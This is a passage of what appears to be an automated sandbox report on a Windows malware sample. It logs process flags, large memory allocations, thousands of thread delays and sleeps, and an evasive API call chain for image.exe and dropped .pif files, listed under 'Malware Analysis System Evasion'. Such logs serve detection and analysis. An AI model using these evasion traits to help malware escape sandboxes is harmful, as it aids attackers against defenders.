Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\user\Desktop\image.exe	Memory allocated: 2C90000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Memory allocated: 2C91000 memory commit 500178944	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Memory allocated: 2CBC000 memory commit 500002816	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Memory allocated: 2CBD000 memory commit 500199424	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Memory allocated: 2CEE000 memory commit 501014528	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Memory allocated: 2DE6000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Memory allocated: 2DE8000 memory commit 500015104	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2CA0000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2CA1000 memory commit 500178944	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2CCC000 memory commit 500002816	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2CCD000 memory commit 500199424	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2CFE000 memory commit 501014528	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2DF6000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2DF8000 memory commit 500015104	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2ED0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2ED1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2EFC000 memory commit 500002816
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2EFD000 memory commit 500199424
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 2F2E000 memory commit 501014528
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 3026000 memory commit 500006912
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Memory allocated: 3028000 memory commit 500015104

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Memory allocated: 2F550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Memory allocated: 2F650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Memory allocated: 2F570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Memory allocated: 27400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Memory allocated: 27AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Memory allocated: 277A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Memory allocated: 25B60000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Memory allocated: 25ED0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Memory allocated: 27ED0000 memory reserve \| memory write watch

Source: C:\Users\Public\Libraries\nhpoymuP.pif

3_2_004019F0

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598393	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598037	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596580	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596231	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595827	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595170	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599891
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599563
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599375
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599136
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 599016
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598891
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598766
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598656
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598547
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598438
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598313
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598188
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 598078
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597969
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597735
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597610
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597485
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597360
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597235
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 597110
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596985
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596860
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596735
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596610
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596485
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596360
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596235
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 596110
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595985
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595860
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595735
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595614
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595485
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595360
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595235
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 595110
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594985
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594860
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594735
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594610
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594485
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594360
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594235
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 594110
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 593985
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Thread delayed: delay time: 593860

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Window / User API: threadDelayed 1605	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Window / User API: threadDelayed 8247	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Window / User API: threadDelayed 7239
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Window / User API: threadDelayed 2578

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_3-23778
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_3-23440

Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 7476	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 7436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 5816	Thread sleep count: 1605 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 5816	Thread sleep count: 8247 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -598393s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -598037s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -596580s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -596343s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -596231s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -595827s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -595170s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -594516s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -594406s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 4192	Thread sleep time: -594297s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep count: 35 > 30
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -599891s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 3652	Thread sleep count: 7239 > 30
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 3652	Thread sleep count: 2578 > 30
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -599672s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -599563s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep count: 31 > 30
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -599375s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -599136s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -599016s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -598891s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -598766s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -598656s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -598547s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -598438s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -598313s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -598188s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -598078s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -597969s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -597844s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -597735s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -597610s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -597485s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -597360s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -597235s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -597110s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -596985s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -596860s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -596735s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -596610s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -596485s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -596360s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -596235s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -596110s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -595985s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -595860s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -595735s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -595614s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -595485s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -595360s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -595235s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -595110s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -594985s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -594860s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -594735s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -594610s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -594485s >= -30000s
Source: C:\Users\Public\Libraries\nhpoymuP.pif TID: 2188	Thread sleep time: -594360s >= -30000s
